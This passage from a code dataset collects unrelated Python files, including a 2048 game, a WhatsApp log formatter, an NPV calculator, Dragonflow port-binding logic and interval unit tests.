self.update_game()\r\n self.game_state()\r\n\r\n\r\n def move_up(self, key):\r\n # Manipulate matrix to move up\r\n self.transpose()\r\n self.stack()\r\n self.combine()\r\n self.stack()\r\n self.transpose()\r\n\r\n # Add tile, update game, check game state\r\n self.add_tile()\r\n self.update_game()\r\n self.game_state()\r\n\r\n\r\n def move_down(self, key):\r\n # Manipulate matrix to move down\r\n self.transpose()\r\n self.reverse()\r\n self.stack()\r\n self.combine()\r\n self.stack()\r\n self.reverse()\r\n self.transpose()\r\n\r\n # Add tile, update game, check game state\r\n self.add_tile()\r\n self.update_game()\r\n self.game_state()\r\n\r\n\r\n def horizontal_move_exists(self):\r\n for i in range(4):\r\n for j in range(3):\r\n if self.matrix[i][j] == self.matrix[i][j + 1]:\r\n return True\r\n return False\r\n\r\n\r\n def vertical_move_exists(self):\r\n for i in range(3):\r\n for j in range(4):\r\n if self.matrix[i][j] == self.matrix[i + 1][j]:\r\n return True\r\n return False\r\n\r\n\r\n \r\n # Function to check game state (win / lose)\r\n def game_state(self):\r\n # Check for 2048 within the matrix\r\n if any(2048 in row for row in self.matrix):\r\n game_over_frame = tk.Frame(self.main_matrix, borderwidth=2)\r\n game_over_frame.place(relx=0.5, rely=0.5, anchor=\"center\")\r\n tk.Label(game_over_frame, text=\"You win!\").pack()\r\n elif not any(0 in row for row in self.matrix) and not self.horizontal_move_exists() and not self.vertical_move_exists():\r\n game_over_frame = tk.Frame(self.main_matrix, borderwidth=2)\r\n game_over_frame.place(relx=0.5, rely=0.5, anchor=\"center\")\r\n tk.Label( game_over_frame, text=\"Game over!\").pack()\r\n\r\n\r\ndef 
main():\r\n Game()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"LoganHoward99/2048-game","sub_path":"2048.py","file_name":"2048.py","file_ext":"py","file_size_in_byte":8674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39659970516","text":"import os\nimport re\n\nfrom docx import Document\nfrom docx.enum.text import WD_ALIGN_PARAGRAPH\nfrom docx.shared import Inches, Pt\n\npath = \"assets/\"\nregexp = re.compile(r'^(0[1-9]|[12][0-9]|3[01])\\.(0[1-9]|1[012])\\.\\d\\d')\n\ndef formatFile(file):\n newContent = \"\"\n fullLine = \"\"\n hasContent = False\n for line in file:\n if (regexp.match(line)):\n if(hasContent):\n hasContent = False\n newContent += fullLine\n fullLine = line\n else:\n fullLine = fullLine.replace(\"\\n\", \" \")\n fullLine += line\n hasContent = True\n file.seek(0)\n file.truncate()\n file.write(newContent)\n\n\ndef transformFile(file):\n document = Document()\n oldDate = \"\"\n lineNumber = 1\n for line in file:\n date = line.split(\",\",1)[0]\n date = date.split(\".\")\n date[2] = \"20\" + date[2]\n date = date[0] + \".\" + date[1] + \".\" + date[2]\n\n if (date != oldDate):\n p = document.add_paragraph()\n run = p.add_run(\"\\n\" + date)\n run.bold = True\n font = run.font\n font.size = Pt(12)\n paragraph_format = p.paragraph_format\n paragraph_format.alignment = WD_ALIGN_PARAGRAPH.CENTER\n oldDate = date\n\n t = document.add_paragraph()\n time = line.split(\", \",1)[1]\n timeNoSec = time.split(\":\", 2)\n timeNoSec = timeNoSec[0] + \":\" + timeNoSec[1]\n t.add_run(timeNoSec).italic = True\n\n if(line.count(':') > 3):\n name = time.split(\":\")[3] + \":\\t\"\n t.add_run(name).bold = True\n text = time.split(\":\")[4].replace(\" \", \"\", 1).replace(\"\\n\", \" \")\n t.add_run(text)\n else:\n text = time.split(\":\", 3)[3].replace(\": \", \":\\t\", 1).replace(\"\\n\", \" \")\n t.add_run(text)\n\n tFormat = t.paragraph_format\n #print(text)\n tFormat.left_indent = Inches(2.5)\n tFormat.first_line_indent = Inches(-2.5)\n print(lineNumber)\n lineNumber += 1\n documentName = (file.name).replace(\".txt\", \".docx\")\n document.save(documentName)\n\nfor filename in os.listdir(path):\n if filename.endswith(\".txt\"):\n filename = os.path.join(path, filename)\n file = open(filename, 'r+')\n formatFile(file)\n file.close()\n file = open(filename, 'r+')\n transformFile(file)\n file.close()","repo_name":"kerschy/WhatsappFormatter","sub_path":"WhatsappFormatter.py","file_name":"WhatsappFormatter.py","file_ext":"py","file_size_in_byte":2415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22435012737","text":"from Tkinter import *\nfrom constants import *\nfrom Segment import *\nfrom math import fabs, pi\n\n\nclass GridCanvas:\n\n segs = []\n helpCircles = []\n can = None\n helpShown = False\n firstCoords = None\n # allowSelfAvoidOnly is an option activated by default (can be deactivated\n # by the user in the GUI) which forbid segments collisions.\n allowSelfAvoidOnly = True\n lead = None\n\n # dct is the segment direction :\n # up -> 3\n # down -> 1\n # right -> 0\n # left -> 2\n\n def __init__(self, root):\n self.segs = []\n self.can = Canvas(root, bg=CBG, height=GSIZE, width=GSIZE)\n self.can.pack(expand=YES, side=LEFT)\n self.drawHelp()\n self.drawGrid()\n\n # Print help, add or remove segments with the mouse\n self.can.bind(\"\", self.click)\n self.can.bind(\"\", self.swipe)\n self.can.bind(\"\", self.swipeEnd)\n\n # Add or remove 
segments with the keyboard arrows\n for key in [\"\", \"\", \"\", \"\"]:\n self.can.bind(key, self.keyMove)\n\n # Move the draw on the screen. Keybinds :\n # \"q\": left\n # \"d\": right\n # \"z\": up\n # \"s\": down\n for key in [\"q\", \"d\", \"z\", \"s\"]:\n self.can.bind(key, self.keyCam)\n\n # Launch undo\n self.can.bind(\"\", self.undo)\n # Launch segments rotations around the double clicked point\n self.can.bind(\"\", self.doubleClick)\n\n self.lead = self.can.create_oval(MIDDLE - 3, MIDDLE - 3, MIDDLE + 3, MIDDLE + 3, fill=LFILL)\n\n # Necessary to avoid clicking on the window/grid at start\n self.can.focus_force()\n\n def drawGrid(self):\n \"\"\" Draws the grid on which the segment are gonna be bound \"\"\"\n for div in range(NBCELL):\n sec = SSIZE*div\n self.can.create_line(0, sec, GSIZE, sec, width=3, fill=GFILL)\n self.can.create_line(sec, 0, sec, GSIZE, width=3, fill=GFILL)\n\n def drawHelp(self):\n \"\"\" Draw circles on each cross on the grid to help the user \"\"\"\n self.helpCircles = []\n for hor in range(1, NBCELL):\n for ver in range(1, NBCELL):\n x = SSIZE*hor\n y = SSIZE*ver\n temp = self.can.create_oval(x - CR, y - CR, x + CR, y + CR, **HCOPT)\n self.helpCircles.append(temp)\n\n def hideHelp(self):\n \"\"\" Hide the circles (help) \"\"\"\n for circle in self.helpCircles:\n self.can.itemconfig(circle, **HCOPT)\n self.helpShown = False\n\n def showHelp(self):\n \"\"\" Show the circles (help) \"\"\"\n for circle in self.helpCircles:\n self.can.itemconfig(circle, **SCOPT)\n self.helpShown = True\n\n def wipe(self, segments):\n \"\"\" Clean the segments and redraw the walk given in parameter \"\"\"\n self.firstCoords = None\n self.moveLead(MIDDLE, MIDDLE)\n for seg in self.segs:\n self.can.delete(seg.getGraphicObject())\n seg.rmGraphicObject()\n self.segs = segments\n self.redrawSegs()\n\n def moveLead(self, x, y):\n \"\"\" Move the lead on the coordinates given in parameter \"\"\"\n self.can.coords(self.lead, x - 3, y - 3, x + 3, y + 3)\n\n def segRequest(self, x, y, X, Y, dct=None):\n \"\"\" Create a new segment at the coordinates given in parameter if possible.\n If there is already the last created segment, segRequest() delete it. 
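Drawing the reverse of the last segment therefore acts as a one-step undo.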
\"\"\"\n free = self.freePoint(X, Y)\n if (not free) or (not self.allowSelfAvoidOnly):\n # segment backtrack\n if self.counterSeg(x, y, X, Y):\n if len(self.segs) > 0:\n self.moveLead(X, Y)\n else:\n leadX, leadY = self.segs[-1].getStartPoint()\n self.moveLead(leadX, leadY)\n self.eraseLastSeg()\n return\n if free:\n if dct is None:\n dct = self.findDct(x, y, X, Y)\n seg = Segment(x, y, dct)\n self.segs.append(seg)\n self.drawSeg(seg, SFILL)\n self.moveLead(X, Y)\n\n def requestSegByCircle(self, circle):\n \"\"\" Calculates the segment coordinates when it is created with the mouse \"\"\"\n Xa, Ya, Xb, Yb = self.can.coords(circle)\n X = (Xa + Xb)/2\n Y = (Ya + Yb)/2\n if self.segs == []:\n if self.firstCoords is not None:\n x, y = self.firstCoords\n else:\n self.firstCoords = (X, Y)\n self.moveLead(X, Y)\n return\n else:\n x, y = self.segs[-1].getEndPoint()\n cont = self.continuous(x, y, X, Y)\n if cont:\n self.segRequest(x, y, X, Y)\n\n def requestSegByDct(self, dct):\n \"\"\" Calculates the segment direction when it is created with the keyboard \"\"\"\n if self.segs == []:\n x, y = MIDDLE, MIDDLE\n else:\n x, y = self.segs[-1].getEndPoint()\n X, Y = {\n 0: (x + SSIZE, y),\n 1: (x, y + SSIZE),\n 2: (x - SSIZE, y),\n 3: (x, y - SSIZE),\n }[dct]\n self.segRequest(x, y, X, Y, dct)\n\n def findDct(self, x, y, X, Y):\n \"\"\" Return the segment direction \"\"\"\n if x == X:\n if Y < y:\n return 3\n else:\n return 1\n else:\n if X > x:\n return 0\n else:\n return 2\n\n def counterSeg(self, x, y, X, Y):\n \"\"\" Return segments number between the start point and the end point \"\"\"\n if self.segs == []:\n return False\n st = self.segs[-1].getStartPoint()\n end = self.segs[-1].getEndPoint()\n return st == (X, Y) and end == (x, y)\n\n def freePoint(self, X, Y):\n \"\"\" Check if it is possible to draw a segment at the cordinated given in\n parameter. \"\"\"\n if X < 0 or Y < 0 or X > GSIZE or Y > GSIZE:\n return False\n if not self.allowSelfAvoidOnly:\n return True\n if self.segs == []:\n return True\n if self.segs[0].getStartPoint() == (X, Y):\n return False\n for seg in self.segs:\n if seg.getEndPoint() == (X, Y):\n return False\n return True\n\n def continuous(self, x, y, X, Y):\n \"\"\" Check if the space between the first point and the second point is\n composed by continuous segments \"\"\"\n hor = fabs(x - X) == SSIZE and y == Y\n ver = fabs(y - Y) == SSIZE and x == X\n return (hor and not ver) or (ver and not hor)\n\n def drawSeg(self, seg, sfill=SFILL):\n \"\"\" Draw segment(s) from the start point to the end point. \"\"\"\n x, y = seg.getStartPoint()\n X, Y = seg.getEndPoint()\n go = self.can.create_line(x, y, X, Y, width=3, fill=sfill)\n seg.addGraphicObject(go)\n\n def eraseLastSeg(self):\n \"\"\" Clear the last segment \"\"\"\n self.can.delete(self.segs.pop().getGraphicObject())\n\n def redrawSegs(self):\n \"\"\" Draw a walk given in parameter \"\"\"\n for seg in self.segs:\n self.drawSeg(seg)\n\n def findInter(self, x, y):\n \"\"\" Check if the cursor is in a circle (hitbox) :\n yes -> return the circle,\n no -> return false. 
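Used as the hit test by the click, swipe and doubleClick handlers.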
\"\"\"\n items = self.can.find_overlapping(x, y, x, y)\n for item in items:\n if item in self.helpCircles:\n return item\n return False\n\n def swipe(self, event):\n \"\"\" Create segments in following the cursor\n (Called when the left mouse button is keeping pressed) \"\"\"\n if not self.helpShown:\n self.showHelp()\n circle = self.findInter(event.x, event.y)\n if circle:\n self.requestSegByCircle(circle)\n\n def swipeEnd(self, event):\n \"\"\" Hide circles (help)\n (Called when the left mouse button is released) \"\"\"\n if self.helpShown:\n self.hideHelp()\n\n def click(self, event):\n \"\"\" Show help and initialize the first segment point\n (Called when the left mouse button is pressed) \"\"\"\n if self.segs == []:\n startCircle = self.findInter(event.x, event.y)\n if startCircle:\n xa, ya, xb, yb = self.can.coords(startCircle)\n self.firstCoords = ((xa + xb)/2, (ya + yb)/2)\n if not self.helpShown:\n self.showHelp()\n\n def doubleClick(self, event):\n \"\"\" Rotates all following segments from the double clicked node\n (Called when the left button is pressed twice) \"\"\"\n doRotation = False\n\n self.can.focus_force()\n interCircle = self.findInter(event.x, event.y)\n if interCircle:\n xa, ya, xb, yb = self.can.coords(interCircle)\n inter = ((xa + xb)/2, (ya + yb)/2)\n for seg in self.segs:\n if (not doRotation) and (seg.getStartPoint() == inter):\n doRotation = True\n lastInter = inter\n if doRotation:\n seg.place(lastInter)\n seg.rotate(pi/2)\n lastInter = seg.getEndPoint()\n\n self.wipe(self.segs)\n\n def moveAllSeg(self, dct, amount=1):\n \"\"\" Move all segments in a direction given in parameter \"\"\"\n dx, dy = {\n 0: (amount * SSIZE, 0),\n 1: (-amount * SSIZE, 0),\n 2: (0, amount * SSIZE),\n 3: (0, -amount * SSIZE)\n }[dct]\n for seg in self.segs:\n seg.move(dx, dy)\n self.wipe(self.segs)\n self.moveLead(dx, dy)\n\n def keyMove(self, event):\n \"\"\" Set a direction from the keyboard arrow pressed by the user, and create\n a new segment in this direction \"\"\"\n UP = 111\n RIGHT = 114\n DOWN = 116\n LEFT = 113\n dct = {\n RIGHT: 0,\n DOWN: 1,\n LEFT: 2,\n UP: 3\n }[event.keycode]\n self.requestSegByDct(dct)\n\n def keyCam(self, event):\n \"\"\" Set a direction from the keyboard arrow pressed by the user, and move\n the map in this direction\n z : up\n q : left d : right\n s : down \"\"\"\n dct = {\n \"d\": 0,\n \"s\": 1,\n \"q\": 2,\n \"z\": 3\n }[event.char]\n self.moveAllSeg(dct)\n\n def undo(self, event=None):\n \"\"\" Delete the last segment (uses the fact that creating a segment over the\n last one erase it).\n TODO : make it compatible with rotation \"\"\"\n if not self.segs == []:\n self.requestSegByDct((self.segs[-1].getDct() + 2) % 4)\n","repo_name":"Aquassaut/Serpentide","sub_path":"GridCanvas.py","file_name":"GridCanvas.py","file_ext":"py","file_size_in_byte":10794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23065928020","text":"#seive of eratosthenes\ndef sieve(n):\n\t\tif n<=2: # if n is less than 2, return empty list\n\t\t\treturn [] #no prime numbers\n\t\tis_prime = [True] * n #create a list of booleans\n\t\tis_prime[0] = False # 0 is not prime\n\t\tis_prime[1] = False # 1 is not prime\n\n\t\tfor i in range(2, int(n**0.5)+1):\n\t\t\tx = i*i #multuiples of i are not prime\n\t\t\twhile x < n: \n\t\t\t\tis_prime[x] = False \t\n\t\t\t\tx += i \n\n\t\treturn [i for i in range(n) if is_prime[i] ] \t\n\n\t\t\n\nprint(sieve(12554)) # runtime 
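in seconds ~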
0.0009970664978027344\n","repo_name":"vasu8480/Programs-HackerRank-LeetCode-","sub_path":"Python/Algorithms/Problems/seive.py","file_name":"seive.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"73239385744","text":"#!/usr/bin/env python\n\n\"\"\"The setup script.\"\"\"\n\nfrom setuptools import setup, find_packages\n\nwith open('README.rst') as readme_file:\n readme = readme_file.read()\n\nwith open('HISTORY.rst') as history_file:\n history = history_file.read()\n\nrequirements = ['Click>=7.0', ]\n\nsetup_requirements = [ ]\n\ntest_requirements = [ ]\n\nsetup(\n author=\"Colm Halpin\",\n author_email='colm.halpin@bchcustoms.com',\n python_requires='>=3.5',\n classifiers=[\n 'Development Status :: 2 - Pre-Alpha',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Natural Language :: English',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n ],\n description=\"Meursing coder - creates customs master data for agrifood products requiring a four-digit additional code for customs and duty purposes\",\n entry_points={\n 'console_scripts': [\n 'meursing=meursing.cli:main',\n ],\n },\n install_requires=requirements,\n license=\"MIT license\",\n long_description=readme + '\\n\\n' + history,\n include_package_data=True,\n keywords='meursing',\n name='meursing',\n packages=find_packages(include=['meursing', 'meursing.*']),\n setup_requires=setup_requirements,\n test_suite='tests',\n tests_require=test_requirements,\n url='https://github.com/bchcustoms/meursing',\n version='0.1.0',\n zip_safe=False,\n)\n","repo_name":"bchcustoms/cuspy","sub_path":"meursing/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35909989466","text":"annual_salary=float(input(\"Enter your annual salary:\"))\r\nportion_saved=float(input(\"Enter the percent of your salary to save, as a decimal: \"))\r\ntotal_cost=float(input(\"Enter the cost of your dream home:\"))\r\nm=1\r\nportion_deposit=0.20\r\ncurrent_savings=0\r\nm_salary=annual_salary/12\r\nr=0.04\r\nsemi_annual_raise=0.10\r\nmoney_needed=total_cost*portion_deposit\r\nwhile(current_savings= size):\n return avg/count\n else:\n None\n\n for i in self.agent_list:\n if (i.getId() != requesting_agent.getId()):\n if(i.getBias(other_agent_group) != None):\n avg += i.getBias(other_agent_group)\n count += 1\n avg = avg / count\n\n if(count >= size):\n return avg\n else:\n None\n\n # @jit(nopython=True)\n def getNetPayoff(self):\n net = 0\n for i in self.agent_list:\n net += i.getPayoff()\n return net","repo_name":"deep-inder/prejudice_model","sub_path":"nGroups/faction.py","file_name":"faction.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35690028022","text":"from selenium import webdriver\n\ndriver=webdriver.Chrome()\n\ndriver.get('http://www.weather.com.cn/html/province/jiangsu.shtml')\n\nele=driver.find_element_by_id('forecastID')\n\ncity_temps=ele.text.split('℃\\n')\n\nlowest=None\nlowest_city=[]\nfor temp in city_temps:\n temp=temp.replace('℃','')\n # print(temp)\n #城市名\n city_name= temp.split('\\n')[0]\n #温度\n 
weather=temp.split('\\n')[1]\n #低温\n lowtemp=min([int(one) for one in weather.split('/')])\n\n if lowest==None or lowtemp\" + b\n )\n with download() as paths:\n for path in paths():\n assert path.read_text().startswith(\"\")\n assert path.read_text().endswith(\"
\\n\")\n download.http.assert_called_once()\n","repo_name":"cuducos/calculadora-do-cidadao","sub_path":"tests/test_download.py","file_name":"test_download.py","file_ext":"py","file_size_in_byte":4282,"program_lang":"python","lang":"en","doc_type":"code","stars":150,"dataset":"github-code","pt":"48"} +{"seq_id":"75120188944","text":"import numpy as np\nimport pandas as pd\n\nimport json\nimport sys\n\nimport common\n\nclass NPVDataSet:\n\n def __init__(self, npv_file):\n\n with open(npv_file, 'r') as f:\n npv_data = json.load(f)\n\n self.total_year = npv_data['Years']\n self.uptime = npv_data['Uptime']\n self.capex = self.Capex(npv_data['CAPEX'], self.total_year)\n self.opex = self.Opex(npv_data['OPEX'])\n self.drillex = self.Drillex(npv_data['DRILLEX'], self.total_year)\n self.discount_rate = npv_data['Discount_rate']\n self.oil_price = npv_data['Oil_price']\n self.fopt = self.FOPT(npv_data['FOPT'])\n\n def get_capex(self):\n\n return self.Capex(self.capex)\n\n class Capex:\n def __init__(self, capex, total_year):\n self.start_year = capex['Start_year']\n self.fraction = capex['Fraction']\n\n # Check fraction\n temp = 0\n for frac in self.fraction:\n temp += frac\n if temp > 1:\n raise ValueError('Capex fraction aggregation is more than 1!')\n\n # Check start_year\n if self.start_year > total_year :\n raise ValueError('Capex start year is beyond the total year')\n elif self.start_year <= 0 :\n raise ValueError('Capex start year has to be positive')\n else:\n pass\n\n # Check length\n if self.start_year + len(self.fraction) - 1 <= total_year:\n pass\n else:\n raise ValueError('Capex fraction is too long or total year is too short')\n\n\n self.amount = capex['Amount']\n\n class Opex:\n def __init__(self, opex):\n self.start_year = opex['Start_year']\n self.amount = opex['Amount']\n\n class Drillex:\n def __init__(self, drillex, total_year):\n self.start_year = drillex['Start_year']\n self.excalation = drillex['Excalation']\n self.amount = drillex['Amount']\n self.wells = drillex['Wells']\n\n # Check start_year\n if self.start_year > total_year :\n raise ValueError('Drillex start year is beyond the total year')\n elif self.start_year <= 0 :\n raise ValueError('Drillex start year has to be positive')\n else:\n pass\n\n # Check length\n if self.start_year + len(self.wells) - 1 <= total_year:\n pass\n else:\n raise ValueError('Drillex well planning is too long or total year is too short')\n\n\n class FOPT:\n def __init__(self, fopt):\n self.start_year = fopt['Start_year']\n self.data = fopt['Data']\n\ndef get_production_total(total_year, start_year):\n\n # Set production data to match the starting year\n fopt_data = np.load(npv.fopt.data)\n\n # Input fopt data to the data frame\n fopt_list = []\n for ii in range(1, total_year + 1):\n if ii < start_year:\n fopt_list.append(0.0)\n else:\n fopt_list.append(fopt_data[ii-start_year])\n\n return fopt_list\n\ndef get_revenue(fopt, oil_price):\n\n return fopt*npv.oil_price\n\ndef get_drillex(total_year, start_year, amount, excalation, wells):\n\n drillex_data = np.zeros(total_year)\n\n for i in range(start_year, start_year + len(wells)):\n drillex_data[i-1] = wells[i-start_year]*amount*((1+excalation)**i)\n\n return drillex_data\n\ndef get_capex(total_year, start_year, amount, fraction):\n\n capex_data = np.zeros(total_year)\n\n for i in range(start_year, start_year + len(fraction)):\n capex_data[i-1] = fraction[i-start_year]*amount\n\n return capex_data\n\ndef get_opex(total_year, start_year, amount):\n\n opex_data = np.zeros(total_year)\n\n for i in 
range(start_year, total_year + 1):\n opex_data[i-1] = amount\n\n return opex_data\n\ndef get_discounted_cash_flow(total_year, cash_flow, discounted_rate):\n\n dcf_data = np.zeros(total_year)\n cash_flow = np.array(cash_flow)\n for i in range(1, total_year+1):\n dcf_data[i-1] = cash_flow[i-1]/((1 + discounted_rate)**i)\n\n return dcf_data\n\nif __name__ == \"__main__\":\n\n if len(sys.argv) != 3:\n print('To run: python npv_calculation.py /path/to/npv_dataset.json/ /path/to/result.csv/')\n sys.exit(1)\n\n file_path = sys.argv[1]\n result_path = sys.argv[2]\n\n npv = NPVDataSet(file_path)\n\n uptime_days = npv.uptime * 365\n\n # Initialize dataframe\n df = pd.DataFrame(index=range(1,npv.total_year+1))\n\n df['FOPT (stb)'] = get_production_total(npv.total_year, npv.fopt.start_year)\n df['Revenue (USD)'] = get_revenue(df['FOPT (stb)'], npv.oil_price)\n df['Drillex (USD)'] = get_drillex(npv.total_year, npv.drillex.start_year, npv.drillex.amount, npv.drillex.excalation, npv.drillex.wells)\n df['Capex (USD)'] = get_capex(npv.total_year, npv.capex.start_year, npv.capex.amount, npv.capex.fraction)\n df['Opex (USD)'] = get_opex(npv.total_year, npv.opex.start_year, npv.opex.amount)\n df['Total_Cost (USD)'] = df['Drillex (USD)'] + df['Capex (USD)'] + df['Opex (USD)']\n df['Cash_Flow (USD)'] = df['Revenue (USD)'] - df['Total_Cost (USD)']\n df['DCF (USD)'] = get_discounted_cash_flow(npv.total_year, df['Cash_Flow (USD)'], npv.discount_rate)\n\n total_wells = np.sum(npv.drillex.wells)\n net_present_value = df['DCF (USD)'].sum()\n\n\n print(df)\n # Writing results to the path\n\n common.write_to_csv('NPV Calculation', result_path)\n common.append_to_csv('Dataset source, %s \\n' %file_path, result_path )\n common.append_to_csv('Total number of years, %s, Years \\n' %npv.total_year, result_path )\n common.append_to_csv('Uptime, %s \\n' %npv.uptime, result_path )\n common.append_to_csv('Discount rate, %s \\n' %npv.discount_rate, result_path )\n common.append_to_csv('Oil price, %s, USD/stb \\n' %npv.oil_price, result_path )\n common.append_to_csv('Total number of wells, %s \\n \\n' %total_wells, result_path )\n\n df.to_csv(result_path, mode='a')\n # data = [34700000., 33700000., 26700000., 20100000., 15300000., 11600000., 8720000.,\n # 6620000., 5010000., 3730000., 2760000., 2100000., 1590000., 1150000.]\n\n common.append_to_csv('\\n', result_path )\n common.append_to_csv('Net Present Value (NPV), %s, USD \\n' %net_present_value, result_path )\n # np.save(\"./json_files/npv_calculation/FOPT.npy\", data)","repo_name":"iffanh/petlab","sub_path":"random/npv_calculation.py","file_name":"npv_calculation.py","file_ext":"py","file_size_in_byte":6419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18789113164","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\nfrom oslo_log import log\n\nfrom dragonflow.controller import df_base_app\nfrom dragonflow.controller import port_locator\nfrom dragonflow.db.models import constants as model_constants\nfrom dragonflow.db.models import l2\n\n\nLOG = log.getLogger(__name__)\n\n\ndef _port_update_unbind(lport, orig_lport):\n # wasn't bounded any way\n if orig_lport.enabled is False:\n return\n\n # port moved between chassis or admin disabled\n if (orig_lport.is_local != lport.is_local\n or orig_lport.is_remote != lport.is_remote\n or lport.enabled is False):\n if orig_lport.is_local:\n orig_lport.emit_unbind_local()\n elif orig_lport.is_remote:\n orig_lport.emit_unbind_remote()\n\n\ndef _port_update_bind(lport, orig_lport):\n # not needed to be bound\n if lport.enabled is False:\n return\n\n # port moved between chassis or admin enabled\n if (orig_lport.is_local != lport.is_local\n or orig_lport.is_remote != lport.is_remote\n or orig_lport.enabled is False):\n if lport.is_local:\n lport.emit_bind_local()\n elif lport.is_remote:\n lport.emit_bind_remote()\n\n\nclass PortBindingApp(df_base_app.DFlowApp):\n def __init__(self, *args, **kwargs):\n super(PortBindingApp, self).__init__(*args, **kwargs)\n self.switch_features_handler()\n\n def switch_features_handler(self, ev=None):\n self._local_ports = set()\n self._remote_ports = set()\n port_locator.reset()\n\n @df_base_app.register_event(l2.LogicalPort, model_constants.EVENT_CREATED)\n def _port_created(self, lport):\n\n if lport.enabled is False:\n return\n\n if lport.is_local:\n lport.emit_bind_local()\n elif lport.is_remote:\n lport.emit_bind_remote()\n\n @df_base_app.register_event(l2.LogicalPort, model_constants.EVENT_UPDATED)\n def _port_updated(self, lport, orig_lport):\n\n _port_update_unbind(lport, orig_lport)\n\n if lport.id in self._local_ports:\n lport.emit_local_updated(orig_lport)\n elif lport.id in self._remote_ports:\n lport.emit_remote_updated(orig_lport)\n\n _port_update_bind(lport, orig_lport)\n\n @df_base_app.register_event(l2.LogicalPort, model_constants.EVENT_DELETED)\n def _port_deleted(self, lport):\n\n if lport.enabled is False:\n return\n\n if lport.id in self._local_ports:\n lport.emit_unbind_local()\n elif lport.id in self._remote_ports:\n lport.emit_unbind_remote()\n\n @df_base_app.register_event(l2.LogicalPort, l2.EVENT_BIND_LOCAL)\n def _port_bound_local(self, lport):\n self._local_ports.add(lport.id)\n\n @df_base_app.register_event(l2.LogicalPort, l2.EVENT_UNBIND_LOCAL)\n def _port_unbound_local(self, lport):\n self._local_ports.remove(lport.id)\n\n @df_base_app.register_event(l2.LogicalPort, l2.EVENT_BIND_REMOTE)\n def _port_bound_remote(self, lport):\n self._remote_ports.add(lport.id)\n\n @df_base_app.register_event(l2.LogicalPort, l2.EVENT_UNBIND_REMOTE)\n def _port_unbound_remote(self, lport):\n self._remote_ports.remove(lport.id)\n","repo_name":"openstack-archive/dragonflow","sub_path":"dragonflow/controller/apps/portbinding.py","file_name":"portbinding.py","file_ext":"py","file_size_in_byte":3742,"program_lang":"python","lang":"en","doc_type":"code","stars":122,"dataset":"github-code","pt":"48"} +{"seq_id":"38908787868","text":"def lillyPadRecursive(lillyPadList, souceIndex, targetIndex): \n if (targetIndex == souceIndex): \n return 0\n if (lillyPadList[souceIndex] == 0): \n return float('inf') \n minJumps = float('inf') \n for i in range(souceIndex + 1, targetIndex + 1): \n if (i < souceIndex + lillyPadList[souceIndex] 
+ 1): \n tempJumps = lillyPadRecursive(lillyPadList, i, targetIndex) \n if (tempJumps != float('inf') and \n tempJumps + 1 < minJumps): \n minJumps = tempJumps + 1\n return minJumps\n\ndef main():\n\tnumLillyPads = int(input())\n\tlillyPadList = input().split(\" \")\n\tfor i in range(len(lillyPadList)):\n\t\tlillyPadList[i] = int(lillyPadList[i])\n\tminJumpsVal = lillyPadRecursive(lillyPadList, 0, len(lillyPadList))\n\tif (minJumpsVal != float('inf')):\n\t\tprint(minJumpsVal)\n\telse:\n\t\tprint(\"-1\")\n\nmain()","repo_name":"Dane1247/CollegeWork","sub_path":"Design & Analysis of Algorithms/Homework 6/Problem 3/Problem3.py","file_name":"Problem3.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71785988945","text":"# test case\n\nimport unittest\nfrom unittest import TestCase\nimport interval\nfrom interval import mergeIntervals\nfrom interval import mergeOverlapping\nfrom interval import insert\n\n\"\"\"test funcstion in interval.py\"\"\"\n\nclass interval_unittest(unittest.TestCase):\n\n def setUp(self):\n pass\n\n # merge interval test\n\n def test_mergeIntervals_1(self):\n a = interval.interval('[1,5]')\n b = interval.interval('[2,7]')\n c = interval.mergeIntervals(a,b)\n self.assertEqual(str(c), '[1,7]')\n\n def test_mergeIntervals_2(self):\n a = interval.interval('[1,2]')\n b = interval.interval('[3,4]')\n c = interval.mergeIntervals(a,b)\n self.assertEqual(str(c), '[1,4]')\n\n def test_mergeIntervals_3(self):\n a = interval.interval('[3,12)')\n b = interval.interval('[12,13)')\n c = interval.mergeIntervals(a,b)\n self.assertEqual(str(c), '[3,13)')\n\n def test_mergeIntervals_4(self):\n a = interval.interval('[1,2)')\n b = interval.interval('(2,4]')\n with self.assertRaises(ValueError) as cm:\n interval.mergeIntervals(a,b)\n the_exception = cm.exception\n self.assertEquals(str(the_exception), 'Disjoint intervals!')\n\n # mergeOverlapping test\n\n def test_mergeOverlapping_1(self):\n a = ['[1,2]', '[3,4]', '[5,6]']\n lst = []\n for item in a:\n lst.append(interval.interval(item))\n b = interval.mergeOverlapping(lst)\n self.assertEqual(str(b), '[[1,6]]')\n\n def test_mergeOverlapping_2(self):\n a = ['[1,2)', '(2,4]', '(4,6]']\n lst = []\n for item in a:\n lst.append(interval.interval(item))\n b = interval.mergeOverlapping(lst)\n self.assertEqual(str(b), '[[1,2), (2,6]]')\n\n def test_mergeOverlapping_3(self):\n a = 